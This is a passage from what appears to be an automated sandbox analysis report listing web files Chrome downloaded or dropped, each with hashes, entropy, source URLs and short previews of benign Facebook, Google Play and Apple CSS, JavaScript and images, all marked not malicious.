                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[572],{24178:function(e,t,n){n.d(t,{BU:function(){return J},EE:function(){return q},GP:function(){return H},L5:function(){return Z},P0:function(){return R},Qk:function(){return B},SC:function(){return O},Z_:function(){return X},tO:function(){return ce},vc:function(){return k},wr:function(){return oe}}).var r={setDelegate:!0}.function o(e){return void 0!==e}function i(e){return o(e)&&null!==e}function a(e){return d(e)&&0===e.length}function u(e){return v(e)&&0===e.length}function s(e){return p(e)&&0===Object.keys(e).length}function l(e){return"function"==typeof e}function c(e){return"number"==typeof e}function f(e){return c(e)&&e%1==0}function d(e){return"string"==typeof e||e instanceof String}function v(e){return!!e&&e.constructor===Array}function p(e){return!!e&&e.constructor===Object}function h(e){return p(e)&&l(e.__lookupGetter__)&&l(e.__lookupSetter__)&&l(e.__defineGetter__)&&l(e.__de
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1306
                                                                                                                                                                                                                                Entropy (8bit):7.741913947586124
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:DfjVw7DmllyXwYwFtNPkorlg3Hp8iIvx3vQEBQN9fBioZwAGYNLdYqhjGKXS078P:jymuXwYwfNP554Hp8Jvx3oEyNnvGQdYl
                                                                                                                                                                                                                                MD5:6390D440E17A073C2ABEFC221B291143
                                                                                                                                                                                                                                SHA1:2A0B2190E567E9E57713FC0515080FF694E87F4F
                                                                                                                                                                                                                                SHA-256:914D2E825037CE7AFB8B31F5F3ABF18C345952B4C3FBC23C28B3C8BA37949C94
                                                                                                                                                                                                                                SHA-512:64C0D0D1D7C0582B7A6651E1D7CFF2B239390DACE349B063E7467DE0E0AD527AA33DEA25181C4B79F671F58649AE85A9D5944EA18C6B64A80AD44B90D969D7F3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/Purple221/v4/89/00/9a/89009a28-b477-04c7-bf2b-5a3cbce98d75/AppIcon-0-0-1x_U007emarketing-0-7-0-sRGB-85-220.png/146x0w.webp
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 ....P....*....>.H.H#"..Z..4.D....1D...........7.y.z8.p...o.3.`.m.1.v..h..F........LY..5.D.%.....f........Zm,rzG....+!..-..?.$V...."....[.s.0G.i....G...}.~..z>.j.-.D.......f.V..@...2.|.....^.U.*.W......rC.<=............=c..w..Q_.tK.n.Z..f...e._...w..G..r 2Y..6.Q..P.....$p...?6....g...J.D........!.#.R..N...Qd....L<.V....5......./>.*j..M..C.8Z...b.......*~.M.?....0u.>"U.g5]'G.h.N.....w.9....hq..b:.@..Qk....~...L...........K/.Y.N._..#....C.K/....a......`..MU..S......t ..X....[...?......mE`.AZ\.wu...k.O%.D!;L........H.......'..q.b.........;O95a.@leI..A.....25.l..C.....h.T5...g(.9..a...F.n....4JLg.2..lu...G.fN.c.{<G.z-..7.N.KK.;1.=2..'..y.W.(.^.`.l....0..........B.....#.u..P.6W..-/.Iu.I. /.......cc..0.!w..u3.[.P.~....fbi........<..r....!...!..+.....U....;...*)....v(.Vx.e.s..../;.8. .....&.0.....Yc..x.`.2_.v.;kh........}.M....K.._..|..j|8O.l.f......@n..+H ..i./..z..P(&Zr....Gm..FsVR.z..kZo2......x.C..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3690)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):16947
                                                                                                                                                                                                                                Entropy (8bit):5.299110238767694
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:85L7fOLuwpL/LCEWI+advfcv4VFjASSX0IwihEiwacpQ9QRLiFtLxnBfyyDLOpR9:dKwsU+ScAzjAScPwk9Q0Xq/A3TG+UV
                                                                                                                                                                                                                                MD5:CD3886DD2DA4A212867702B27E8DEE61
                                                                                                                                                                                                                                SHA1:D60ADE1A303EB57F730C3097A42FDAB911621A30
                                                                                                                                                                                                                                SHA-256:649D031CE36C2818D884B62389FF750A197AE85E8AEB1F2BB85F30396C296FE4
                                                                                                                                                                                                                                SHA-512:FFAF486AAC4AB28DCFF99B34905D6A966517372D8089819CB1094E97436C714190BB942326540B699090B151F2E8F25A78D739D0F7882A9D97F5B83FB3BCED36
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.css"
                                                                                                                                                                                                                                Preview:._51lp{background-clip:padding-box;display:inline-block;font-family:'helvetica neue', Helvetica, Arial, sans-serif;font-size:10px;-webkit-font-smoothing:subpixel-antialiased;line-height:1.3;min-height:13px}._9on4{background-color:#fa383e;border:2px solid #fff;border-radius:50%;height:8px;margin-right:2px;margin-top:2px;position:absolute;text-align:center;top:0;width:8px}._76t_,._79ig{background-color:#fa383e;border-radius:2px;color:#fff;font-size:10px;height:12px;padding:1px 3px;position:absolute;text-align:center;top:0}._76t_{right:2px}._79ig{right:-4px}._7256{opacity:1}._7257{opacity:0}.._6luv{align-items:center;background-color:#fff;border:none;border-radius:8px;box-shadow:0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);box-sizing:border-box;margin:40px 0 0;padding:20px 0 28px;width:396px}._8icy ._6luv{padding-bottom:24px;padding-top:10px}._8iep{height:456px;width:396px}._alwh{height:456px;margin:0 0 68px 68px;width:396px}#facebook ._8iep ._8opt{font-family:SFProDisplay-Se
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2112)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):15767
                                                                                                                                                                                                                                Entropy (8bit):5.317199369389832
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:oDTfwJsGxuBRllOkUP7L4wX1lu1kL0tZJcfA8gT/6SdVQTu9ot:o3w6YuBRiaP/uNU/rG
                                                                                                                                                                                                                                MD5:5F9F4B37178B22CF0BC17D208D462D0F
                                                                                                                                                                                                                                SHA1:FC8811CBF718389DEF90F61F9B97B08CA38EE485
                                                                                                                                                                                                                                SHA-256:AFEBF18C540269CCB206F992F07AF41E3B1AD61697249502709AE68E39A94C1D
                                                                                                                                                                                                                                SHA-512:71744081CA31B871B5D8EC3573EBBF8D80B8875EC7B49D2392E70B4F2D4541F5E12808C7B5B0F98220E70969A3F88B1B89DD00C86CCFC6B7827BD54762685224
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractPopoverButton.react",["cx","URI","joinClasses","react"],(function(a,b,c,d,e,f,g,h){var i,j,k=j||d("react");a=function(a){babelHelpers.inheritsLoose(b,a);function b(){return a.apply(this,arguments)||this}var d=b.prototype;d.render=function(){var a=this.props.config,b={},d=a.defaultMaxWidth;this.props.maxwidth!==void 0&&(d=this.props.maxwidth);d&&(b.style=babelHelpers["extends"]({},a.button.props.style,{maxWidth:d+"px"}));this.props.image&&(b.image=k.jsx("span",{className:"_-xe _3-8_",children:this.props.image}));this.props.label&&(b.labelIsHidden=this.props.labelIsHidden,b.label=k.jsx("span",{className:"_55pe",children:this.props.label}));this.props.haschevron&&(b.imageRight=k.jsx("span",{className:"_4o_3",children:a.chevron}));b.className=c("joinClasses")(a.button.props.className,"_2agf _4o_4");b.href=new(i||(i=c("URI")))("#");b["aria-haspopup"]=!0;b.role="button";return k.cloneElement(a.button,b)};return b}(k.Component);a.defaultProps={haschevron:!0};g[
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5412)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):24511
                                                                                                                                                                                                                                Entropy (8bit):5.289985780121086
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:0TYQYedjpgxos5vhfdfZKJx9gZpPT0u8EIV5FBrdJ+K28Vh4JMSh2EAYsj9fuF6D:1oNrLuUnQIWUY/rSVTXYfWBdx
                                                                                                                                                                                                                                MD5:FDE068BF4FA00806F58A5D600D76D9F1
                                                                                                                                                                                                                                SHA1:1FC5FDCE92C2F120B56C059B441D98C5F6FB8A78
                                                                                                                                                                                                                                SHA-256:E87F4BEB246FFA950DEA8D0E4A072BC75F272A2B8BB19630709168F259F319DF
                                                                                                                                                                                                                                SHA-512:8E7FE86E690E1A0AAF7C7AEDB8C389295A907C4D8BF92BBE0FF53ECA657EE36EDF98183398F0196C0DE94CE410EE9F82D81CD3723E1098C32640C428BF34ABF6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yI/l/0,cross/TZbd1-PK_cx.css"
                                                                                                                                                                                                                                Preview:._2e42{box-sizing:border-box}.._al7c{align-items:center;display:flex;inset:0;justify-content:center;position:absolute;z-index:101}._am3h{inset:0;position:fixed}._al7d{background-color:#fff;box-shadow:0 2px 26px rgba(0, 0, 0, .3), 0 0 0 1px rgba(0, 0, 0, .1);display:flex;flex-direction:column;overflow:hidden;position:relative;width:548px;z-index:10}._am89{background-color:var(--card-background);border-radius:3px;box-shadow:0 2px 26px rgba(0, 0, 0, .3), 0 0 0 1px rgba(0, 0, 0, .1);display:flex;flex-direction:column;overflow:hidden;position:relative;width:548px}._ao4p{background-color:var(--card-background);border-radius:3px;box-shadow:0 2px 26px rgba(0, 0, 0, .3), 0 0 0 1px rgba(0, 0, 0, .1);display:flex;flex-direction:column;overflow:hidden;position:relative;width:548px}._algs{background-color:#fff;border-radius:12px;box-shadow:0 2px 26px rgba(0, 0, 0, .3), 0 0 0 1px rgba(0, 0, 0, .1);display:flex;flex-direction:column;overflow:hidden;padding:1.5rem;position:relative;width:548px}._albn{
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):2956
                                                                                                                                                                                                                                Entropy (8bit):7.88859483065207
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:WQNgGanuVeeoU7iJqnIfcv+hL74NZHshSWFFi2Mi6zJ8+vBwzuHCZRDBMX1O0/D:WQNcuVJoicqnSeWL748hHFi2M5zJ82wK
                                                                                                                                                                                                                                MD5:36050C4139EABA6CFDE078722B053FB5
                                                                                                                                                                                                                                SHA1:46B057F57871D12F09744B8183149DB51CA1521A
                                                                                                                                                                                                                                SHA-256:9057FF9ED18269440F23DEB3464BB9D8BFDF60A3197EB9313EDC78E11BD061AB
                                                                                                                                                                                                                                SHA-512:1434E2B590862B3BA26535FFBFB804E41EB2FE2A724ECBE91F17B1364BB617390C1E278DCFC3B80F9294E820F3DBBE20443C2F746DED2BCB96F100867CB96EF7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/VRMWkE5p3CkWhJs6nv-9ZsLAs1QOg5ob1_3qg-rckwYW7yp1fMrYZqnEFpk0IoVP4LM=s52-rw
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8Lx.../3....3m..N.g<...O.F.....D.$..m$IN..ZkL..pI.m#I.*.8...C@.H.?.........J.{4vjV.......2../.\.....i.c.h[..UKZ.m.v.5..l.%.mTm......}...t...$..HY.>I...K.c~.HI.x.m.mk.r.c.u....m.v...}o.D.o...m.6.l.9.Po1....D....cd..<..X..(Gwp.......H.q.V,..Xe.S.K7.,a.QGF.%.mb...1.".0....HB..XI,..JK...D.H4....S1.4....)A`.j......I,.0.i...... .1...:.0.00.&..JhB.((.I..1....".J.B95H#.....Rbh.Ji..PZ.(Jb2.....H.E(...h ..1.5L.4..H(h.h(E.....A!..."./MP4b`dd...|...C\l;..f...-.+v.r..| .Dc... t.P!..U.C..a.....}>7...I.<......d].Q'..c._3..........T.%.0..E......|.f.k...$#.s..D~.7{&.gd.Ba..D...0...6.........sD.33i...D...3..;...NE$..Bu`)s..L...8\..!u]...J..B&4%.v1.v.o..#...W...".a.P .]. ...~...{.....9_.....$.....$.1.....yA..=;......@.T..8......"AB@(P .+..|....*N..0......DEx.....z\6R.....Q$.AB(....}...7.|..Y..eK.2.....6..|.%.....5,....T.P! ..E...,/.....YM..^....a.\m."ym.........hI.]...s../.8#++}.P$H(..%A...Gm.H^....9|...).V.r...-....Z ......5+4..aa...K..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (706)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9181
                                                                                                                                                                                                                                Entropy (8bit):5.4852034502040885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:AF5goLTDknN2Sur1sWEI/Jw+Oo+EIgOgKUUElA4ayhL/dM7PUK8xIOG:AF5bLTDknN2SuryHI/Jw+Oo+ELOgKvEg
                                                                                                                                                                                                                                MD5:19114D72B8411A78A0C1BFF574A892A4
                                                                                                                                                                                                                                SHA1:3E79EB7C0B5350E2C549163AE802CDEB3FE5DDE2
                                                                                                                                                                                                                                SHA-256:9BE1D9E313B8AEA8AD5DDBB7047DB370EA5582A2FAD9B5F32502C96D1E4B42FE
                                                                                                                                                                                                                                SHA-512:42583F367F6BBA6C349322A06243B1F2C6A9842B80AC398B8E4699A5924C94EE325C92D44C07C6FCD15369634EFB2E2D71231EF9BA28398E2907A4B4A04DBABC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{.var YK;_.XK=function(a){this.H=a||{cookie:""}};_.l=_.XK.prototype;._.l.set=function(a,b,c){let d;var e=!1;let f;if(typeof c==="object"){f=c.cia;e=c.A5||!1;d=c.domain||void 0;var g=c.path||void 0;var h=c.oN}if(/[;=\s]/.test(a))throw Error("Jc`"+a);if(/[;\r\n]/.test(b))throw Error("Kc`"+b);h===void 0&&(h=-1);c=d?";domain="+d:"";g=g?";path="+g:"";e=e?";secure":"";h=h<0?"":h==0?";expires="+(new Date(1970,1,1)).toUTCString():";expires="+(new Date(Date.now()+h*1E3)).toUTCString();this.H.cookie=a+"="+b+c+g+h+e+(f!=null?";samesite="+f:"")};._.l.get=function(a,b){const c=a+"=",d=(this.H.cookie||"").split(";");for(let e=0,f;e<d.length;e++){f=d[e].trim();if(f.lastIndexOf(c,0)==0)return f.slice(c.length);if(f==a)return""}return b};_.l.remove=function(a,b,c){const d=this.get(a)!==void 0;this.set(a,"",{oN:0,path:b,domain:c});return d};_.l.tn=function(){return YK(this).keys};_.l.Ci=function(){return
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2283)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):166620
                                                                                                                                                                                                                                Entropy (8bit):5.486114772138449
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:5oNQkTAiHf5ABlmykOCr9LLBgNQesypfCmnIGVkrrTvbYAQ54TxeCTnOouNZaNz/:5oNQkTAiHfOBlm7OCr9LLBgQesyImIu8
                                                                                                                                                                                                                                MD5:D1851758E12833F8DD4849617EB8A686
                                                                                                                                                                                                                                SHA1:D185FEB8FE332E8D0A844ADE57CAC5013620328F
                                                                                                                                                                                                                                SHA-256:00F2EAE100EFE4476C49D713914767C4C967EBC831FCF15C9EB8CDAFD688BB8C
                                                                                                                                                                                                                                SHA-512:6FBA3D3F357519C8FFE5BE5D2069188C967470D9EC25BFF4222437C2A410AD09F02C33EFADC75AD1537A21129D9256A881ED4E770863C83913D2AA1087C849CB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x19b747, 0x103eba3, 0x3f00c093, 0x18c1c783, 0x1, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var baa,daa,iaa,kaa,Ia,saa,xaa,zaa,db,gb,Baa,Caa,Daa,Eaa,lb,nb,Gaa,Iaa,Kaa,sb,Naa,Paa,Qaa,Taa,Waa,Yaa,Zaa,cba,fba,$aa,eba,dba,bba,aba,gba,lba,mba,Nb,qba,tba,vba,uba,wba,bc,ac,zba,ic,Dba,Eba,Gba,Fba,Iba,Jba,Kba,Mba,Lba,Pba,tc,Qba,Rba,Sba,uc,Uba,Vba,xc,Xba,Zba,$ba,Lc,bca,cca,Ic,gca,hca,Hc,Jc,kca,rca,wca,xca,yca,Zc,Bca,vca,hd,Tca,gda,xd,ida,yd,mda,oda,Cd,vda,yda,xda,zda,Ada,Bda,Cda,Dda,Fda,Gda,Kda,Mda,Rda,Sda,Zda,$da,aea,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6604
                                                                                                                                                                                                                                Entropy (8bit):7.9551157296637225
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:e0IsgH7UQzehOvabtTXcKEdLKjzqKJSLnbqTb4GeJy7AhTCh0I:Ks/JJ/IKfqKwbADAhdI
                                                                                                                                                                                                                                MD5:256A1425D0A85C1AB0591D25DEC11ACB
                                                                                                                                                                                                                                SHA1:6124B098B2B927CCCA1EB60CC6A2905BAE9AB83B
                                                                                                                                                                                                                                SHA-256:C302E89E457BED90F3A4B45693BBC21A12C0674271744B7934994C37F48ECB71
                                                                                                                                                                                                                                SHA-512:BD3D0B0B483E98DAB7CCB4740340D44AC51010EE6A40FCBBA585FA5638174B42C10ED1757254991CDBEA4E46B638CD3D372471B6537BB15767C66A6BDD11E3C8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 B....}...*....>.J.I#"...,.4.D....Re.`.`.......4.X?..<..O.....~.|..\.........7.]....o.......{..........W.o./.....}.}..k............q.o.O.-.....k......I._..v....?.~..$}t}..o..y}...@.(....z..~m......S.....8.......~..N.7.>...k}!GX...G$.m......t.2..Pw...i....T...K.6N.=y.......+|.h..k..H......ui...)ereH.......&{.XQ./.+. 8....E..;F..pP...W%.UZ..7s.."p.w....@..........n#rc.......,..Fn...|)@.V.2IG$..C.ZI8K:M...:I.\../;.......h.....Ap..ww.%..I......9'wx"C.$f...f.%i'......H....Vx.......W>n,w...._......G.r,.b...%.V..Z.#...:..uq.a..u-...*...+...A..F..Pcn..T+Yu.....IP.EI;h.z..NZ.P.1.X......V...m..._...n...J*8..u.<t.....;9..}.<..z;5........3.......L$.....y.|..PM.TJ......xMJ...k.o....g(.~....~..].N...8..G.3.\}..`.P/q.....2..=%...,.0F!1.........A.....\T..v..>..<I].x"P\(..6../;........G$...J.......P...$.J...j...0_....+m{.....%....)CBx.s.G..M.........6.".J./..B...s.H?.]..a.`H..r..lpZ'.5wQ.+..|..e.x....x......w.|.....x.......0
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):645
                                                                                                                                                                                                                                Entropy (8bit):7.631563068517978
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:6v/7ihaL0Z6T2rkLv0cLSbLzKlRv+reS0TZPhnv8NuKS8jrRJI1b3g0hfue9:riS+v05bLzK7CmTRhnUTJjk1b3Jhfj
                                                                                                                                                                                                                                MD5:EA2722D3B676D5CDD4F7225E65695112
                                                                                                                                                                                                                                SHA1:97E5E94CFF5B62F60BA76C7DD9F606304AF8B10C
                                                                                                                                                                                                                                SHA-256:317E5FDAA14E548C0045D5E662709CFE0B692E0384A8396CF22054BF0A1E1C48
                                                                                                                                                                                                                                SHA-512:BF06CE48B306A0EA13EBC7BE92CB56440DDF1C35C214BA7C164DECFDA6E2E7AAAB31605196D0690BE4FF509404701CA620C504A5EDF0C3E6A12C6FA5A73C78DA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR... ... .....szz....LIDATx.b .<|...P|.h(.E.0.....|.x.......a.....!.....q{.t.U...(.A.g.....w.3,&.s.~..h2.....Ip=..4!..[.................r.p6.R......R.....19]z.......%.E.q..........6".#...9..Y.n.U.ZU.ZMu:.Q:t%..y`<.+.0T6.=.i.0.e..a.f...b.\..Ax..e...K...$7..BAk@.\f..}bG.K....\Nk@.T.ha.+.w.%x.5.....k..OJr...$Gd....,.0....n.{..b........%].....K.....?....f....w....j4...@%p{?...|>.....hH.h.....r....h..s.J..@X.j..3#h>.`@Xw..l.K.;).c..>....V.b. T....0B.4....%G......a[..P.........G..B"..!*...m9rj%.....E.AD*...0...!..y``....o.z...1J.FF,..sEr3.s.&....b.m.+.........'.m3(D..{..:..So.Ja..*......#..'....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (24721)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):167425
                                                                                                                                                                                                                                Entropy (8bit):5.65366769963361
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:9WH9S6sfBXM8dWFcmaKr55Q8YS8KFC246sfBXIGJ5UpkyJXE6pNiK+mK4kwmO9tR:OMLa8dWFck55z4LeqULXHybkBT
                                                                                                                                                                                                                                MD5:157BD8852DB4A30534786D34C27D9E3F
                                                                                                                                                                                                                                SHA1:90284E3C138F73944BFAC3AD6D24BD1637F48E62
                                                                                                                                                                                                                                SHA-256:36CF25DFC02770F6C4725855E51BCE0368926A56ADC85F8DDE142CA368B914F6
                                                                                                                                                                                                                                SHA-512:969B2931539001E1264EB6B4CD8FB24B3D3200D1D85C52C55E26EE21B15133AAEF61A3CD0808F1F8F47D6665B4B9AF4CE1DDEA3D4B3F438E6E7E2D6673882A33
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iMyQ4/yx/l/en_GB/yUeQb7xXYnw.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BusinessObjectRelationshipType.facebook",["$InternalEnum"],(function(a,b,c,d,e,f){a=b("$InternalEnum").Mirrored(["AGENCY","NONE","OWNER"]);c=a;f["default"]=c}),66);.__d("BizKitSettingsAdAccountStrings",["fbt","BusinessAccountRenameGating","react"],(function(a,b,c,d,e,f,g,h){"use strict";var i;a=i||d("react");var j=d("BusinessAccountRenameGating").getBARenameEnabled();b=h._("Deactivate ad account");c=h._("Make active");e=h._("Are you sure that you want to deactivate your ad account?");f=h._("{=m0}{=m1}",[h._implicitParam("=m0",a.jsx("p",{children:h._("It will stop all of your current campaigns and prevent you from resuming or creating new ads. Any outstanding balance on your account will be charged to your credit card. The credit cards on your account will be automatically removed after your outstanding balance has been settled. This process may take up to two working days.")})),h._implicitParam("=m1",a.jsx("p",{children:h._("If you'd like to stop your ads but pl
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5350)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):8550
                                                                                                                                                                                                                                Entropy (8bit):5.488074989821379
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:Pvz2+ys2GQF6iEsa3ciiBJ9IhHr9dlxhrwXN:Pq+hdj6ociWShHr9/k9
                                                                                                                                                                                                                                MD5:180D3DC21F96EE7F7569F0B134B00F3E
                                                                                                                                                                                                                                SHA1:50BBC0FB9185A7D61A04A3D38B0096BAB03F2852
                                                                                                                                                                                                                                SHA-256:7181A9AF310EC41433F3FDE10F7BC0F3E520830E241E35D93FA9C2E7799C8FD3
                                                                                                                                                                                                                                SHA-512:877EA279161C94E823066AFDC9FD7BD338F82EEFA8459FAFD3B35CCE196F0434D2685396CC703C86934016AA18CDD566DE986AFA645CAC3EBC3E1C464DDD213A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/WXyn0RO_iMz.css"
                                                                                                                                                                                                                                Preview:._6eft{display:inline-block;outline:1px dashed #fba000;width:100%}._6efu{display:inline-block;min-height:10px;min-width:10px;width:100%}.@font-face{font-family:'Roboto';font-style:normal;font-weight:400;src:local('Roboto'), local('Roboto-Regular'), url(/rsrc.php/yH/r/c_1vdG88uNh.woff2) format('woff2'), url(/rsrc.php/yN/r/KKlOyJQcRfr.woff) format('woff')}@font-face{font-family:'Roboto';font-style:italic;font-weight:400;src:local('Roboto Italic'), local('Roboto-Italic'), url(/rsrc.php/yh/r/pXADmoqqN0T.woff2) format('woff2'), url(/rsrc.php/yX/r/4JKQuH0Oopd.woff) format('woff')}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;src:local('Roboto Bold'), local('Roboto-Bold'), url(/rsrc.php/yU/r/zSaFQ46AO2w.woff2) format('woff2'), url(/rsrc.php/yR/r/_gCoI-iROin.woff) format('woff')}@font-face{font-family:'Roboto';font-style:italic;font-weight:700;src:local('Roboto Bold Italic'), local('Roboto-BoldItalic'), url(/rsrc.php/yo/r/Tq0RmTByOSK.woff2) format('woff2'), url(/rsrc.php/yM
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):196938
                                                                                                                                                                                                                                Entropy (8bit):5.135396650531942
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:+jNyqUXiJc25xwftWJc6qdcLwQnQoAkSWZmT6ocTzVqJlO4QA3chodGWXTDvFz8L:cUXiuatrXojm
                                                                                                                                                                                                                                MD5:00457FBC4A59737B8E35F6AB9FA9CB0C
                                                                                                                                                                                                                                SHA1:18E6E6066B28939E219A4CF8E45F07CF25C601F8
                                                                                                                                                                                                                                SHA-256:F5EC5CFEFC085F50D63BC1E671B579DE23B1F9C0999A60DE6853552910730A31
                                                                                                                                                                                                                                SHA-512:79B47CE7F6F45B4A80E2B808AA26072E627AA84A50C70E2E9E58E6DB31713CCF28AD79E45B15AB81DC4B74FFB2D4854D22E182C1EF1D666C65A9AABB9B0AC81E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/api-www/global-elements/global-header/v1/assets/globalheader.css
                                                                                                                                                                                                                                Preview:@charset "UTF-8";#globalheader{all:unset}#globalheader html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}#globalheader body{margin:0;padding:0}#globalheader ul,#globalheader ol,#globalheader li,#globalheader dl,#globalheader dt,#globalheader dd,#globalheader h1,#globalheader h2,#globalheader h3,#globalheader h4,#globalheader h5,#globalheader h6,#globalheader hgroup,#globalheader p,#globalheader blockquote,#globalheader figure,#globalheader form,#globalheader fieldset,#globalheader input,#globalheader legend,#globalheader pre,#globalheader abbr,#globalheader button{margin:0;padding:0}#globalheader pre,#globalheader code,#globalheader address,#globalheader caption,#globalheader th,#globalheader figcaption{font-size:1em;font-weight:400;font-style:normal}#globalheader fieldset,#globalheader iframe{border:0}#globalheader caption,#globalheader th{text-align:left}#globalheader table{border-collapse:collapse;border-spacing:0}#globalheader main,#globalheader summary,#globalheader det
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):456657
                                                                                                                                                                                                                                Entropy (8bit):7.996221657022145
                                                                                                                                                                                                                                Encrypted:true
